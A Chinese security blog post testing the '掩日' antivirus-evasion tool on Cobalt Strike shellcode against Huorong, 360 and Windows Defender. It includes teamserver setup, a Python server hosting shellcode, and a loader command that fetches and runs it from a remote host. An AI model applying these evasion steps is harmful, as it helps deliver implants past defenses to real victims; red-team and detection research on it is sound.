更新时间:2022.05.16
本文首发乌鸦安全知识星球
1. 介绍
掩日免杀是一个非常优秀的项目,目前在
4月19
号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
https://github.com/1y0n/av_evasion_tool/
下载之后本地打开:(记得关闭杀软)
2. 环境配置
安装环境:
Windows10
虚拟机
在这里新版本掩日采用了
gcc
环境和
go
环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装
gcc
和
go
的环境:
gcc安装
gcc --version
go安装
go version
3. 环境
在作者的介绍中,针对
Cobalt Strike
生成的木马要求:
针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。
因此在这里我们使用最常用的
CS
的木马来进行操作。
3.1 环境准备
在本地启动一个
CS
,服务端:
sudo ./teamserver 10.30.1.147 123
启用客户端,并新增监听,在这里使用作者建议的
HTTPS
方式:
然后生成一个
payload.c
文件:
3.2 测试环境
测试机:
- Windows10 360主动防御
- Windows7 火绒主动防御
- Windows10 开启windows Defender
其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。
4. 免杀测试
4.1 通用免杀
在这里选择直接执行的方式,并且使用隐藏窗口的模式:
此时生成成功:
4.1.1 火绒(成功)
此时没有发现问题,上线测试:
4.1.2 360(成功)
关闭360的自动上传样本功能:
然后按位置扫描,没有发现问题:
上线测试下,此时上线正常:
4.1.3 Windows Defender(失败)
此时的
Windows Defender
病毒库为最新版本:
静态测试
动态上线(被杀)
在上线之后,立刻被拦截查杀:
在这里可以发现,三个杀软中只有
Windows Defender
难过,因此针对它进一步进行测试:
在这里选择了加密方法,然后再去生成木马,但是发现过
Windows Defender
的时候,依旧被杀。
4.1.4 强力模式(成功)
在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的
CPU
此时静态查杀,依旧正常
动态上线正常:
4.2 分离免杀
在这里执行的时候,会生成两个文件,一个是不含
shellcode
的
shellcode
加载器,另外就是一个
shellcode
文件(可能经过了各种加密变形)。
此时生成了两个文件:
静态查杀正常:
动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将
exe
加载,并且跟上分离文件的名称才可以:(此时没有杀软)
当有
Windows Defender
的时候:
直接被动态查杀,再试试其他的方式,发现全部被杀
4.3 网络分离
将生成的
shellcode
加载器放到目标机器上,并在目标机能访问到的机器上开启一个
http
服务:
python3 -m http.server 802
然后在远程进行加载:
dUu.exe http://10.30.1.147:802/dUu.txt
还是被
Windows Defender
杀了:
5. 总结
在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。
当然
Windows Defender
依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求
Bypass everyone
!
版权归原作者 乌鸦安全 所有, 如有侵权,请联系我们删除。